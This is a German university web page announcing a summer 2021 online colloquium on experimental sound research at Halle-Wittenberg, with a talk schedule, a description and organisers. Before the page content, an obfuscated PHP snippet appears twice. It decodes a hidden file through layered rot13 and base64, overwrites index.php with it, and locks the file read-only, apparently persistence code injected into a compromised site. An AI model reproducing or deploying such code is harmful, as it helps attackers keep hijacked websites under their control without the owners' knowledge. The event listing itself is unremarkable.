$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Kolloquium Experimentelle Klangforschung Lehrstuhl für Musik und Medien – Auditive Medienkulturen

Kolloquium Experimentelle Klangforschung Lehrstuhl für Musik und Medien

Sommersemester 2021 | Dienstags, 18:00 Uhr

  • 18.05.2021 Karin Martensen (Technische Universität, Berlin): »Das Mikrofon als magischer Gegenstand«
  • 01.06.2021 Malte Pelleter (Leuphana Universität Lüneburg): »Zeit//Maschinen//Zu//Hören – Drei Futurhythmatische Listening Sessions«
  • 15.06.2021 Christina Dörfling (Hochschule für Musik Franz Liszt Weimar): »Unerhört – über Potentiale schaltungssensibler Musikforschung«
  • 29.06.2021 Nikita Braguinski (Humboldt-Universität zu Berlin): »Zwischen Empfehlung und Erstellung. Künstliche Intelligenz in der populären Musik«
  • 13.07.2021 Sarah-Indriyati Hardjowirogo (Hochschule für Musik und Theater Hamburg): »Musikinstrumente als Medien, Klangmedien als Instrumente. Potenziale einer Perspektiverweiterung«

Das »Kolloquium Experimentelle Klangforschung« ist ein Raum für Gespräche über anwendungsbezogene, erfahrungspraktische und experimentelle wissenschaftliche Zugänge zu den Verflechtungen von Musik und Medien mit ihren Ästhetiken, Technologien und Kulturen sowie mit einem transdisziplinären Blick auf die darauf gerichteten Perspektiven aus Musik- und Medienwissenschaft, Sound Studies und weiteren Forschungsfeldern.

Die Beiträge thematisieren unterschiedliche Ansätze, wie zu, aber gleichermaßen mit und durch Klang geforscht werden kann. Medialisierung und Digitalisierung der Musik- und Audiokultur mit ihren Auswirkungen auf ästhetische Formationen, Performativität und soziale Kontexte erhalten dabei besondere Beachtung.

Das Kolloquium wird organisiert vom Team des neu installierten Lehrstuhls »Musik und Medien« an der Martin-Luther-Universität Halle-Wittenberg: Prof. Dr. Golo Föllmer, Dr. Anna Schürmer, Alan van Keeken und Christoph Borbach.

Die Online-Vorträge des Kolloquiums sind öffentlich.

Link für alle Sitzungen: https://zoom.us/j/4411974271
Weitere Infos und Anfragen: alan.van-keeken@musikwiss.uni-halle.de